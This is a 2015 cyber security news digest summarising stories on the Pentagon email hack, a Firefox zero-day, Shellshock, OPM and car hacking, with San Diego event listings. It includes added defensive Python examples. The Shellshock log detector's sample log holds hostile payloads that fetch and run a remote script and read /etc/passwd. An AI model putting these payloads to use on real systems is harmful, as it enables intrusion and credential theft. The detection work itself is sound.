CYBER NEWS TIDBITS FOR YOU - AUGUST 2015

Welcome to Cyber News Tidbits 4U!

Here are updated news compilations from the Cyber Security Community

Topic headers (+++):

1 – Security news you can likely use (re: management / opportunity items)

2 – Other items of general FYI / FYSA level interest

3 – Threats / bad news stuff / etc.. 

and…

4 – SD/SoCAL items of interest / opportunities   (send me your SD meetings!) 


Another periodic cyber security news gram / digest / tidbits,

Arranged top-down by “likely” interest level, with more short snippets, fewer threats and only a few local events (at the very bottom)

Feedback is always welcome too, as is sending me articles to share… cyber information sharing in action!

http://www.linkedin.com/in/mikedavissd

http://www.sciap.org/blog1/wp-content/uploads/CISO-Fundamentals.pdf

(all links have been checked out… though you may need to cut & paste into your browser.)

August 10

+ BLACK HAT Briefs …and… associated white papers (all PDFs)

Could not get there this year?  You can pick up some of the key points with these presentations, papers!!!

https://www.blackhat.com/us-15/briefings.html

AND… the Black Hat attendee survey: ‘time to rethink enterprise IT security???’

https://www.blackhat.com/docs/us-15/2015-Black-Hat-Attendee-Survey.pdf

 

+  DEFCON 2015 briefs (enter at your own risk…;-))

If you intend to peek at code, I would recommend a Chromebook, a throwaway VM, or a separate partition on your HD… you KNOW the drill for these folks…;-))

https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20presentations/Speaker%20&%20Workshop%20Materials/

+  Report: Russia hacked Pentagon’s Joint Staff email

Russia is behind a spearphishing attack that forced the Pentagon to shut down its Joint Staff unclassified email system, NBC News is reporting. The hack, which took place around July 25, affected approximately 4,000 military and civilian personnel, NBC News reported. The news outlet cited U.S. officials who called the intrusion a “sophisticated cyberattack.” Pentagon officials have kept the system offline for almost two weeks. According to the NBC report, the cyberattack used a very fast-paced automated system that collected large amounts of data from the email accounts then distributed it to thousands of other accounts.

http://www.nextgov.com/cybersecurity/2015/08/reports-russia-hacked-pentagons-joint-staff-email/118939/?oref=ng-channeltopstory

+ Russia hacks Pentagon computers: They should be better protected than OPM???         

Really scary part: “…Automated process to steal massive amounts of data and distribute to thousands of Internet points in a few minutes…” So we all know the value of a balanced cyber posture; as many know, it’s the first few hours (now minutes!) of an attack in which we must detect and then thwart it (even as we know the average data breach takes some 200 days to be discovered, often reported by a third party…:-((  ). Must speed up the front end of the cyber kill chain: detect (I&W) with multiple methods… then defend!

http://www.cnbc.com/2015/08/06/russia-hacks-pentagon-computers-nbc-citing-sources.html

+ ‘New and different vulnerability’ exploited in Joint Staff email hack

A spear phishing attack into the unclassified email of the Pentagon’s Joint Staff “exposed a new and different vulnerability” than has been seen in the past, a senior Defense official told CNN on Wednesday. For more than 10 days, some 4,000 users on the Defense Department network have been without their email while military cyber experts have tried to scrub and rebuild the network. Spear phishing attacks are targeted emails to specific employees that dupe them into giving up their network credentials. Military cyber experts have concluded the attackers were specifically targeting the Joint Staff, hoping to learn what they could from the unclassified email network.

http://edition.cnn.com/2015/08/05/politics/joint-staff-email-hack-vulnerability/index.html

 

+ 0-day attack on Firefox users stole password and key data: Patch now!

A website in Russia has been caught exploiting a serious zero-day vulnerability in Mozilla’s Firefox browser, prompting the open-source developer to deliver an emergency update that fixes the flaw. The bug in the built-in PDF reader allowed attackers to steal sensitive files stored on the hard drives of computers that used the vulnerable Firefox version. The attack was used against both Windows and Linux users, Mozilla researcher Daniel Veditz wrote in a blog post published Thursday. The exploit code targeting Linux users uploaded cryptographically protected system passwords, bash command histories, secure shell (SSH) configurations and keys. The attacker downloaded several other files, including histories for MySQL and PgSQL, configurations for Remmina, FileZilla and Psi+, and text files that contained the strings “pass” and “access” in their names. Any shell scripts were also grabbed.

Patching (Firefox 39.0.3 and ESR 38.1.1 carry the fix) stops the next theft but does not undo this one: if a vulnerable Linux build visited the wrong site, treat every SSH key, shell/DB history and “pass”/“access” file in that home directory as disclosed, and rotate the credentials in them.

http://arstechnica.com/security/2015/08/0-day-attack-on-firefox-users-stole-password-and-key-data-patch-now/
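The list above doubles as a rotation checklist. As an added example (not from the Ars article, Mozilla, or this newsletter), here is a small Python triage script that walks a home directory and inventories the same file classes the Linux payload collected, so you know exactly what to rotate. The directory conventions for Remmina, FileZilla and Psi+ are assumptions about where those tools keep their data, and the sample home directory it builds is entirely constructed dummy content.

```python
import re
import tempfile
from pathlib import Path

# File classes the write-up lists as taken from Linux victims. Where the tools
# keep their data (~/.filezilla, ~/.remmina or ~/.config/remmina, Psi+ under
# ~/.config) is an assumption; we match the tool name anywhere in the path.
HISTORY_FILES = {".bash_history", ".mysql_history", ".psql_history"}
TOOL_DIRS = ("remmina", "filezilla", "psi+")
SECRET_NAME = re.compile(r"pass|access", re.IGNORECASE)

def classify(rel: Path):
    """Map a path relative to $HOME to the class the exploit collected, or None."""
    lowered = rel.as_posix().lower()
    if rel.parts and rel.parts[0] == ".ssh":
        return "ssh_keys_and_config"
    if rel.name in HISTORY_FILES:
        return "shell_and_db_history"
    if any(tool in lowered for tool in TOOL_DIRS):
        return "remote_access_tool_config"
    if rel.suffix == ".txt" and SECRET_NAME.search(rel.name):
        return "text_named_pass_or_access"
    if rel.suffix == ".sh":
        return "shell_script"
    return None

def find_exposed(home: Path) -> dict:
    """Inventory of files under `home` the payload would have uploaded, grouped by class."""
    found = {}
    for path in sorted(home.rglob("*")):
        if path.is_file():
            label = classify(path.relative_to(home))
            if label:
                found.setdefault(label, []).append(path.relative_to(home).as_posix())
    return found

def build_sample_home(root: Path) -> None:
    """Constructed stand-in for a developer's home directory (all contents are dummies)."""
    files = {
        ".ssh/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\ndummy\n",
        ".ssh/config": "Host prod\n  HostName 203.0.113.10\n",
        ".bash_history": "mysql -u root -pHunter2\n",
        ".psql_history": "select 1;\n",
        ".filezilla/sitemanager.xml": "<FileZilla3/>\n",
        ".config/psi+/accounts.xml": "<accounts/>\n",
        "notes/db-access.txt": "staging db: ...\n",
        "deploy.sh": "#!/bin/sh\nrsync -a . prod:/srv/app\n",
        "photos/cat.jpg": "not really a jpeg\n",
    }
    for rel, content in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)

def demo() -> dict:
    """Build the sample home in a temp dir and return its inventory."""
    root = Path(tempfile.mkdtemp(prefix="ff-triage-"))
    build_sample_home(root)
    return find_exposed(root)

if __name__ == "__main__":
    # Point find_exposed(Path.home()) at a real account to get the real list.
    for label, paths in demo().items():
        print(f"[{label}] rotate/review: {', '.join(paths)}")
```

Run it against a real account with `find_exposed(Path.home())`; anything it lists is what an attacker holding this exploit walked away with, which is why the right response is rotation, not just the browser update.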

 

+U.S. decides to retaliate against China’s hacking

The Obama administration has determined that it must retaliate against China for the theft of the personal information of more than 20 million Americans from the databases of the Office of Personnel Management, but it is still struggling to decide what it can do without prompting an escalating cyberconflict. The decision came after the administration concluded that the hacking attack was so vast in scope and ambition that the usual practices for dealing with traditional espionage cases did not apply.

http://www.nytimes.com/2015/08/01/world/asia/us-decides-to-retaliate-against-chinas-hacking.html?_r=2

 

+ Researchers create first firmware worm that attacks Macs

The common wisdom when it comes to PCs and Apple computers is that the latter are much more secure. Particularly when it comes to firmware, people have assumed that Apple systems are locked down in ways that PCs aren’t. It turns out this isn’t true. Two researchers have found that several known vulnerabilities affecting the firmware of all the top PC makers can also hit the firmware of Macs. What’s more, the researchers have designed a proof-of-concept worm, for the first time, that would allow a firmware attack to spread automatically from MacBook to MacBook, without the need for them to be networked.

http://www.wired.com/2015/08/researchers-create-first-firmware-worm-attacks-macs/?mod=djemCIO_h

 

+ Sea-to-sea: China hacks in U.S.

A National Security Agency map that shows nearly 700 cyber-assaults on computers at American military installations, government agencies, businesses and educational institutions raises the question among security experts whether the NSA should have shared some of that information. The NSA map, from 2014 and obtained by NBC News, purports to show the Chinese government’s massive cyber-assault on all sectors of the U.S. economy, including major firms such as Google and Lockheed Martin, as well as the U.S. government and military. Red dots representing more than 600 corporate, private or government sites can be seen on the map, with many of the dots concentrated along the northeast corridor and Silicon Valley. The highest number of attacks were in California.

http://www.govinfosecurity.com/interviews/sea-to-sea-china-hacks-in-us-i-2825#

 

+ Federally funded project focuses on tracking data to prevent advanced persistent threats

The Defense Advanced Research Projects Agency and the Air Force Research Laboratory are seeking greater insight into how data are tracked between computers, Internet hosts and browsers with the intention of detecting and stopping advanced persistent threats. To that end, the Georgia Institute of Technology announced June 30 that it was awarded a $4.25 million contract from the two agencies in a four-year project called “THEIA” to discover exactly where data moves as it’s routed from one host to another and if, for example, malicious code is attached to that data.

http://www.fiercegovernmentit.com/story/federally-funded-project-focuses-tracking-data-prevent-advanced-persistent/2015-08-03

 

+ Survey exposes consumer fears about car hacking

Recent high-profile hacks have heightened awareness about the vulnerability of cars to electronic attacks, and there is real concern about vehicle cybersecurity, according to Kelley Blue Book’s new Vehicle Hacking Vulnerability Survey. The study’s results show that 71 percent of respondents are aware of the Jeep Cherokee hacking revealed last month by Wired, an incident that triggered the recall of over 1.4 million cars and trucks. The study also notes that more than three-quarters of respondents believe vehicle hacking will become a frequent problem within the next three years. The wide-ranging survey also investigated who consumers blame for these potential security issues, as well as how consumers would like these cyber-vulnerabilities handled.

http://www.cnet.com/news/survey-exposes-consumer-fears-about-car-hacking/#ftag=CAD590a51e

 

+ Apple and Google know what you want before you do

Apple Inc. and Google Inc. are racing to anticipate the needs of their users. The technology giants, whose software runs nearly all of the world’s smartphones, are adding features to deliver information before users ask for it. Their moves suggest that smartphones will evolve into devices that dispense information unprompted. The companies are tackling the technology differently, reflecting their own expertise and priorities. Apple’s Proactive Assistant, a feature of its forthcoming iOS 9 software, aims to learn how a user will behave from information stored on an iPhone. By contrast, Google Now combs data from a universe of online services and searches.

http://www.wsj.com/articles/apple-and-google-know-what-you-want-before-you-do-1438625660?mod=rss_Technology

 

+ Is hacking back a cyber-theft deterrent option?

A new report from the Hudson Institute on economic espionage in cyberspace reflects a shifting conversation in Washington from passive to proactive cyber defense – to the point of suggesting that an “Economic Warfare Command” be set up at the Treasury Department for using offensive coercion against adversaries. Cyber economic warfare is the pursuit of political and security goals through “cyber-enabled economic aggression,” and “in this type of warfare, the United States is particularly vulnerable,” said Samantha Ravich… (NOT unless you are the LAW!)

http://fcw.com/articles/2015/08/03/cyber-theft.aspx

 

+ VA launches cyber squad

LaVerne Council, the new CIO at the Department of Veterans Affairs, has assembled a team charged with coming up with an overall cybersecurity plan for the agency. The new Enterprise Cybersecurity Strategy Team will be led by Susan McHugh-Polley, a senior executive program manager at VA. The team includes executives and subject matter experts from across the VA’s Office of Information and Technology. “The team’s scope includes management of current cybersecurity efforts as well as development and review of VA’s cybersecurity requirements and operations holistically — from desktop to software to network protection,” a VA spokesperson told FCW.

http://fcw.com/articles/2015/08/04/va-cyber-squad.aspx

 

+ Dream of free and open Internet dying, lawyer says

The dream of a free and open Internet is slowly being killed by overregulation, censorship and bad laws that don’t stop the right people, a top computer crime defense lawyer says. The annual Black Hat computer security conference in Las Vegas kicked off Wednesday with a keynote address from Jennifer Granick, director of Civil Liberties at the Stanford Center for Internet and Society. Granick said that while the Internet needs to be reasonably safe in order to be functional, it’s no longer the revolutionary place it was 20 years ago.

http://www.nytimes.com/aponline/2015/08/05/us/ap-us-black-hat.html?_r=0

 

+ Flash zero-day weaponized in record time

The speed with which attackers are weaponizing zero-day vulnerabilities in the wild has been essentially cut in half. New research at Black Hat 2015 from Malwarebytes Labs shows that after Hacking Team, an Italian security company specializing in offensive technology, was compromised, its trove of zero days was leaked to the Internet, including several for Adobe’s Flash Player. The zero days were previously unknown, but were accompanied by clear and concise instructions to deploy them. As a consequence, exploit kit makers integrated them into their digital weapons in record time.

http://www.infosecurity-magazine.com/news/black-hat-2015-zeroday-weaponized/

 

FYI –  Comprehensive, overall Enterprise Mobile Security paper covers key enterprise concerns and mitigation recommendations – plus a specific phone set-up guide.  It’s an extensive overview of the mobile security space, threats, capabilities needed, etc… adding in a guide in the appendix for users and corporate.

It’s pretty useful as is, where we’re looking for folks to help finesse and more widely publish it – interested?

http://www.sciap.org/blog1/wp-content/uploads/Mobile-Security-paper-draft.pdf

 

+ This Man Implanted A Chip In His Arm To Hack His Way Into Buildings

Don’t get squeamish… there are a lot of stealthy reasons he did it, and criminals will have the same ones..

http://www.forbes.com/sites/thomasbrewster/2015/08/05/arm-implant-hacks-offices/

 

+ GE To Offer Industrial Data Analytics in the Cloud

Very nice way to get a PaaS solution to run all your IoT “big data / predictive / forensics ” efforts!!

https://adtmag.com/articles/2015/08/07/ge-predix-cloud.aspx?m=1

 

+ Russia, China And United States Engage In Cyber War

“Cyber WAR” is too fuzzy a term for anyone other than the LAW, FBI, CIA etc. to do “it” – great overviews though

http://www.valuewalk.com/2015/08/russia-vs-china-vs-us-cyber-war/

 

+ Study Reveals the Most Common Attack Methods of Data Thieves

http://www.darkreading.com/partner-perspectives/intel/study-reveals-the-most-common-attack-methods-of-data-thieves/a/d-id/1321544

 

+ Why every CIO needs a cybersecurity attorney (and cyber insurance!)

http://www.cio.com/article/2956374/legal/why-every-cio-needs-a-cybersecurity-attorney.html

 

2  +++++++

+ Organizations should focus on data sharing post-incident, not attribution

There have been several notable security incidents in the news this year, from healthcare and retail breaches, to financial; even security firms themselves have been targeted. In each instance, attribution seems to take the lead during incident response, something organizations should resist. The key is collecting the right information and passing it on to the right people. When it comes to figuring out who did it and where they are, authorities are the ones who should take the lead – organizations that focus on this area first are wasting resources and time.

http://www.csoonline.com/article/2956417/security-industry/organizations-should-focus-data-sharing-post-incident-not-attribution.html

 

+ Feds months away from broader cybersecurity ‘sprint’ strategy following OPM breaches

More than two weeks after the so-called “cybersecurity sprint” wrapped up, resulting in some improved protections across federal agencies, the government is working on an overarching strategy that’s still months away. In a July 31 blog post, Federal Chief Information Officer Tony Scott wrote that a team of more than 100 experts from across the government and private sector are reviewing federal cybersecurity policies, procedures and practices. “Ultimately, the team’s assessment will inform and operationalize a set of action plans and strategies to further address critical cybersecurity priorities and recommend a Cybersecurity Sprint Strategy and Implementation Plan to be released in the coming months,” he wrote.

http://www.fiercegovernmentit.com/story/feds-months-away-broader-cybersecurity-sprint-strategy-following-opm-breach/2015-08-03

 

+ Russian cyber underground goes from strength to strength

The Russian cybercrime underground has evolved to a new level of sophistication and professionalism, with enhanced features such as automation to accelerate sales, as well as translation and anti-spam proof services. That’s according to Trend Micro’s third report on the country, Russian Underground 2.0, which tracked and analyzed 78 forums – each with as many as 20,000 unique members. It claimed that traffic-related products and services – like traffic direction systems (TDSs) and pay-per-install (PPI) services – are “the cornerstone of the entire Russian malware industry” because they provide both an increased number of victims and useful C&C information for targeted attacks.

http://www.infosecurity-magazine.com/news/russian-cyber-underground-strength/

 

+ Shellshock flaw still actively exploited:

Shellshock, the Bash bug disclosed in September 2014, is still being exploited by threat actors, according to a report from Solutionary’s Security Engineering Research Team (SERT). While 10 months should have been enough time for organizations to ensure that they are protected against Shellshock attacks, researchers discovered that there are still numerous vulnerable systems and malicious actors are making the best of it. Data collected by Solutionary in the second quarter of 2015 shows that attackers have found new ways to exploit the Shellshock vulnerability, they have adapted their techniques in an effort to bypass intrusion prevention systems, and they have learned to rapidly extend successful compromises.

http://www.securityweek.com/shellshock-flaw-still-actively-exploited-solutionary
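The point about attackers adapting to bypass intrusion prevention is worth seeing in code. As an added example (not from the Solutionary report or this newsletter), here is a small Python detector that runs a Shellshock check over a handful of constructed Apache access-log lines. It matches the Bash function-definition shape `() { ... };` with flexible whitespace rather than one literal string, URL-decodes each field first, and separately catches the `() { _; } >_[$($())]` variant, which has no `;` after the first brace and so slips past signatures written for the original payload. The IPs, hosts and paths in the sample log are invented.

```python
import re
from urllib.parse import unquote

# Shellshock payloads embed a Bash function definition followed by extra commands.
# A signature for the literal "() { :;};" misses trivial spacing/body variants, so
# match the shape instead: "(" ")" "{" <body> "}" ";" with any whitespace between.
FUNC_DEF = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;")
# Later parser-bug variant with no ";" after the first "}" (dodges FUNC_DEF):
#   () { _; } >_[$($())] { <commands> }
VARIANT = re.compile(r"\(\s*\)\s*\{\s*_\s*;\s*\}\s*>_\[\$\(\$\(\)\)\]")

def is_shellshock(value: str) -> bool:
    """True if a request field carries a Shellshock-style payload, URL-encoded or not."""
    decoded = unquote(value)
    return bool(FUNC_DEF.search(decoded) or VARIANT.search(decoded))

# Apache "combined" format: ip ident user [ts] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

def scan_log(text: str) -> list:
    """One hit per log line whose request line, Referer or User-Agent (the
    headers CGI copies into environment variables) contains a payload."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("req", "ref", "ua"):
            if is_shellshock(m.group(field)):
                hits.append({"ip": m.group("ip"), "field": field,
                             "payload": unquote(m.group(field))})
                break
    return hits

# Constructed sample log: documentation-range IPs, invented hosts and paths.
# Line 1: classic payload; 2: spacing variant; 3: the ">_[$($())]" variant in
# the Referer; 4: URL-encoded payload in the query string; 5: benign traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2015:14:02:11 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.7/x.sh -O /tmp/x; sh /tmp/x'"
203.0.113.5 - - [10/Aug/2015:14:02:12 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "(){ :;   }; /bin/bash -c 'id'"
203.0.113.9 - - [10/Aug/2015:14:03:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "() { _; } >_[$($())] { echo vulnerable; }" "Mozilla/5.0"
203.0.113.9 - - [10/Aug/2015:14:03:41 +0000] "GET /index.html?q=%28%29%20%7B%20%3A%3B%7D%3B%20%2Fbin%2Fcat%20%2Fetc%2Fpasswd HTTP/1.1" 200 512 "-" "curl/7.38.0"
198.51.100.20 - - [10/Aug/2015:14:05:00 +0000] "GET /index.html HTTP/1.1" 200 8192 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/39.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']:<14} {hit['field']:<4} {hit['payload']}")
```

The shape-based regex is deliberately loose (it will flag any `() { ... };` text), which is the right trade for a log-review pass; the lesson is that a detector keyed on one exact byte string is the kind of IPS rule the report says attackers have already learned to sidestep.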

 

+ 7 cybersecurity questions to expect after the OPM breach

The OPM data breach has resulted in considerable “armchair quarterbacking” from government and industry, and already prompted the resignation of OPM Director Katherine Archuleta. While identifying parties, policies and practices responsible for cybersecurity breaches is an understandable part of the post-mortem process, it is more important to learn from recent events and encourage dialog that may result in sound choices in the future for information assurance in major computer systems. The depth and breadth of the OPM breach was a punch to the gut that should fuel a round of introspection and questioning, even for agencies with sophisticated cybersecurity programs in place. And to ensure your organization is not next in the limelight for all the wrong reasons, the answers to these questions must be the right ones.

http://gcn.com/Articles/2015/07/30/7-questions-cybersecurity.aspx?Page=1

 

+ White House preps new cyber policy dealing with federal contractors

The Obama Administration is preparing to release a new policy to homogenize the way vendors secure agency data. The proposal, which could be published as early as today, follows hacks at two background checkers and the Office of Personnel Management that potentially compromised the security of personnel who handle U.S. secrets. “The increase in threats facing federal information systems demands that certain issues regarding security of information on these systems are clearly, effectively, and consistently addressed in federal contracts,” states a notice scheduled to be posted Thursday in the Federal Register.

http://www.nextgov.com/cybersecurity/2015/07/white-house-preps-new-cyber-policy-dealing-federal-contractors/118706/?oref=ng-HPriver

 

+ CYBERCOM wants secretive cyber arms dealer to hack Pentagon

The protection arm of the U.S. Cyber Command says it needs products from Endgame, a company known for crafting hacking tools, but purely to safeguard military networks. The once uber-secretive vendor is part of the cyber arms trade, a legal but controversial industry that sells governments so-called exploits, or “zero-days” in information security parlance. Endgame’s traditional goods are tailored to find and exploit bugs in software that developers have not discovered yet. Typically, the malware is deployed to help disrupt or tap an adversary’s systems. The tools for Cyber Command “cyber protection teams,” however, will not be used to attack adversary networks, but rather to find weaknesses in the dot-mil domain, according to the Air Force, which is managing the purchases.

http://www.nextgov.com/cybersecurity/2015/08/cybercom-wants-secretive-cyber-arms-dealer-hack-pentagon/118911/?oref=ng-channelriver

 

+ Can FITARA prevent future cyberattacks?

The Federal Information Technology Acquisition Reform Act – which aims to give agency chief information officers more authority over their IT budgets – could help CIOs eliminate outdated technology vulnerable to cyberattack, according to a group of federal IT leaders. “A lot of CIOs are getting called into the [deputy secretaries’] offices and they’re getting asked, ‘Is what happened to OPM going to happen to us?’,” the Government Accountability Office’s Director of IT Management Issues David Powner said during a panel Tuesday in Washington on agile IT development.

http://www.nextgov.com/cio-briefing/2015/08/can-fitara-prevent-future-cyber-attacks/118856/?oref=ng-HPriver

 

+ Why banks are turning to tokenization to protect cloud data

Of all the sensitive data moving into the cloud, banking information may be the most precious, which is probably why financial institutions are increasingly looking at tokenization as a way to fend off cybercriminals, recent research suggested. California-based vendor CipherCloud released its “Q2 2015 Global Cloud Data Security Report,” which indicated that tokenization is used by 68 percent of the 50 banks surveyed, particularly for personally identifiable information (PII). It’s a technology that safeguards data by taking something like a bank card number and substituting a randomly generated value of the same length for it, with the real value kept only in a vault the bank controls. That way, even if cybercriminals compromise data in the cloud, it will be nearly impossible for them to use it.

https://securityintelligence.com/news/why-banks-are-turning-to-tokenization-to-protect-cloud-data/#.VcOgIPl0pQC
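To make the “random value of the same length” idea concrete, here is a minimal tokenization vault in Python, added as an example and not taken from CipherCloud, the report, or this newsletter. The vault hands out a random digit string the same length as the card number, keeps the last four so receipts still make sense, and stores the mapping only on its own side; the card number itself never goes to the cloud application. The card number used is the standard “4111…” test PAN, not a real card, and the class and method names are this example’s own.

```python
import secrets
import string

def luhn_ok(digits: str) -> bool:
    """Luhn check-digit test that real card numbers pass."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

class TokenVault:
    """Stand-in for a tokenization service. tokenize() returns a random digit
    string of the same length as the card number (PAN), keeping the last four
    so support staff and receipts can still refer to the card. The PAN stays
    only in the vault's lookup table; everything outside (cloud apps, analytics,
    logs) sees the token alone, which carries no information about the PAN."""

    def __init__(self) -> None:
        self._token_to_pan: dict = {}
        self._pan_to_token: dict = {}

    def tokenize(self, pan: str, keep_last: int = 4) -> str:
        if not (pan.isdigit() and 13 <= len(pan) <= 19 and luhn_ok(pan)):
            raise ValueError("not a plausible card number")
        if pan in self._pan_to_token:        # same card -> same token, so joins still work
            return self._pan_to_token[pan]
        while True:
            body = "".join(secrets.choice(string.digits) for _ in range(len(pan) - keep_last))
            token = body + pan[-keep_last:]
            # Reject a collision with an existing token, a token equal to the PAN,
            # and any token that passes Luhn: a leaked token must neither look
            # like nor be usable as a real card number.
            if token not in self._token_to_pan and token != pan and not luhn_ok(token):
                break
        self._token_to_pan[token] = pan
        self._pan_to_token[pan] = token
        return token

    def detokenize(self, token: str) -> str:
        """Only callable inside the vault's trust boundary (e.g. when charging the card)."""
        return self._token_to_pan[token]

if __name__ == "__main__":
    vault = TokenVault()
    pan = "4111111111111111"                  # standard test PAN, not a real card
    tok = vault.tokenize(pan)
    print(pan, "->", tok, "| token passes Luhn?", luhn_ok(tok))
```

Two design points matter in practice: the token is drawn from a CSPRNG (`secrets`), not derived from the PAN, so there is nothing to reverse; and the whole scheme is only as strong as the vault, so the mapping table needs the access controls and monitoring that the cloud copy of the data no longer requires.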

 

+ Internet firms to be subject to new cybersecurity rules in EU

Internet firms such as Cisco, Google and Amazon will be subject to a new EU cybersecurity law forcing them to adopt tough security measures and possibly report serious breaches to national authorities, according to a document seen by Reuters. The so-called Network and Information Security Directive has been stuck in talks between member states and EU lawmakers because of disagreements over whether to include digital platforms such as search engines, social networks, e-commerce sites and cloud computing providers. Members of the European Parliament want the law to only cover sectors they consider critical, such as energy, transport and finance.

http://www.reuters.com/article/2015/08/06/us-eu-cybersecurity-idUSKCN0QB1ZD20150806

 

+ Secure SDLC – building in software security

Resources to build your SW / apps much more securely (BTW, working on a best practices / how-to paper for this – anyone want to join us?)

https://buildsecurityin.us-cert.gov/articles/knowledge/sdlc-process/secure-software-development-life-cycle-processes

http://resources.infosecinstitute.com/intro-secure-software-development-life-cycle/

http://www.sans.org/reading-room/whitepapers/securecode/software-engineering-security-process-sdlc-1846

https://www.microsoft.com/en-us/SDL/process/design.aspx

AND the Software Assurance Maturity Model (SAMM): http://www.opensamm.org/

 

+ Greenbelt-based MOOC platform offers free cybersecurity courses

http://technical.ly/dc/2015/01/16/cybrary-cybersecurity-moocs/

 

3  +++++++

+ HTML5 privacy hole left users open to tracking for three years

A feature of HTML5 that allows sites to detect battery life on a visitor’s device can also be used to track behavior, a piece of research has revealed. Analysts from France and Belgium made the discovery while investigating the Battery Status API, used in Firefox, Chrome and Opera. “Our study shows that websites can discover the capacity of users’ batteries by exploiting the high precision readouts provided by Firefox on Linux,” the authors write in a paper published online (http://eprint.iacr.org/2015/616.pdf), having focused their efforts on Mozilla’s browser. “The capacity of the battery, as well as its level, expose a fingerprintable surface that can be used to track web users in short time intervals.”

http://www.wired.co.uk/news/archive/2015-08/04/privacy-hole-in-firefox

 

+ Researcher says can hack GM’s OnStar app, open vehicle, start engine

A researcher is advising drivers not to use a mobile app for General Motors Co’s OnStar vehicle communications system, saying hackers can exploit a security flaw in the product to unlock cars and start engines remotely. “White-hat” hacker Samy Kamkar posted a video on Thursday saying he had figured out a way to “locate, unlock and remote-start” vehicles by intercepting communications between the OnStar RemoteLink mobile app and the OnStar service. Kamkar said he plans to provide technical details on the hack next week in Las Vegas at the Def Con conference, where tens of thousands of hacking aficionados will gather to learn about new cybersecurity vulnerabilities.

http://www.reuters.com/article/2015/07/30/us-gm-hacking-idUSKCN0Q42FI20150730

 

+ HAMMERTOSS malware represents culmination of ‘best practices’ for cyber attackers

In only a year, a Russian Advanced Persistent Threat (APT) group has proven to exemplify the future of cyber threats. It’s only a matter of time, FireEye researchers warned, until the group’s tactics make their way over to the cybercrime underworld. The group, known as APT29, uses a new malware called HAMMERTOSS to maintain a covert presence in victims’ systems, FireEye wrote in its report on the malware. Oftentimes, the company’s staff told SCMagazine.com, the malware is used as a last effort, or “the big gun,” when other tools cease working.

http://www.scmagazine.com/apt29-group-tactics-profiled-by-fireeye/article/429298/

 

+ Black Vine espionage group attacked aerospace, energy, healthcare industries

Symantec has been monitoring the activities of the cyber espionage group that breached health insurance giant Anthem last year. Researchers say Anthem is just one of the threat actor’s many high profile targets. The personal details of 80 million individuals were compromised in the Anthem breach that came to light in February. Following the incident, researchers determined that the attackers were linked to Topsec, a Beijing-based IT security company with ties to the Chinese People’s Liberation Army (PLA). According to Symantec, the cyber espionage group behind the Anthem hack, which the company calls “Black Vine,” has been active since 2012. The group has relied on custom-built malware, zero-day exploits, and watering hole attacks to target organizations in the aerospace, healthcare, energy, military and defense, finance, agriculture, and technology industries.

http://www.securityweek.com/anthem-hackers-targeted-multiple-industries-2012-symantec

 

+++  SD/SoCAL security events / opportunities +++

+ CyberTECH events / networking / startups / etc  —  THE cyber happening place in SD!!! 

Join their Meetup Group for the latest event information!   The definition of “Cyber KEWEL”

http://www.meetup.com/cybertech/

 

AUG

13 – ISC2 –  6PM –  Care Fusion – Cyber Security In Healthcare: Just What The Doctor Ordered?  David Scott.

Location – BAH (Suite 200)  4055 Hancock Street, San Diego, CA 92110 USA

20 – ISACA – noon –  Running InfoSec for America’s Finest City – Gary Hayslip – Coleman University

http://isaca-sd.org/event/august-2015-isaca-san-diego-chapter-meeting/

20 – OWASP –  6PM –  Joel Weinberger from Google  (at Qualcomm)

http://www.meetup.com/Open-Web-Application-Security-Project-San-Diego-OWASP-SD/

27 – ISSA – (4th Thurs at 11:30) – “Cybercrime: Operational Risk or Overblown Threat?” – Stephen Cobb

(at ADM Baker field clubhouse)

http://www.sdissa.org/

 

—-  Global  Cyber events:

https://www.secureworldexpo.com/

https://heimdalsecurity.com/blog/44-relevant-cyber-security-conferences-around-the-world/

http://thecyberwire.com/events.htm

——————————————————————————–

August 2

+ Mobile security paper –key enterprise concerns and mitigations, plus set-up guide

We developed an extensive overview of the mobile security space, adding in a guide for users and corporate

It’s useful as is we think, where we’re looking for folks to help finesse and more widely publish it – interested?

http://www.sciap.org/blog1/wp-content/uploads/Mobile-Security-paper-draft.pdf

 

+ Chinese Information Dominance: Encircling America with Weaponized Technology

A very good view of our formidable adversary (in addition to the Russian criminals, ISIS and other terrorists). The PRC’s key fronts are already flanking us big time… in case you needed more proof…:-((

http://sofrep.com/41114/china-encircling-america-weaponized-technology/

 

+ Car hacking: Security experts caution automakers on greater need for cybersecurity

New cars carry more interlinked computing systems than a typical small business. Buried under hoods and behind touchscreen control panels, microprocessors run by millions of lines of code operate an array of crucial functions, from brakes and steering to headlights and horns. Automakers are constantly adding more features, processors and software. This new era in the evolution of motorized transport seems like a win-win situation for all. Most consumers embrace the technologies, and automakers welcome the bigger profit margins that teched-out cars provide. But cybersecurity experts warn: Not so fast.

http://www.ibtimes.com/car-hacking-security-experts-caution-automakers-greater-need-cybersecurity-anti-2026472

 

+ Software vulnerabilities hit record high in 2014, report says

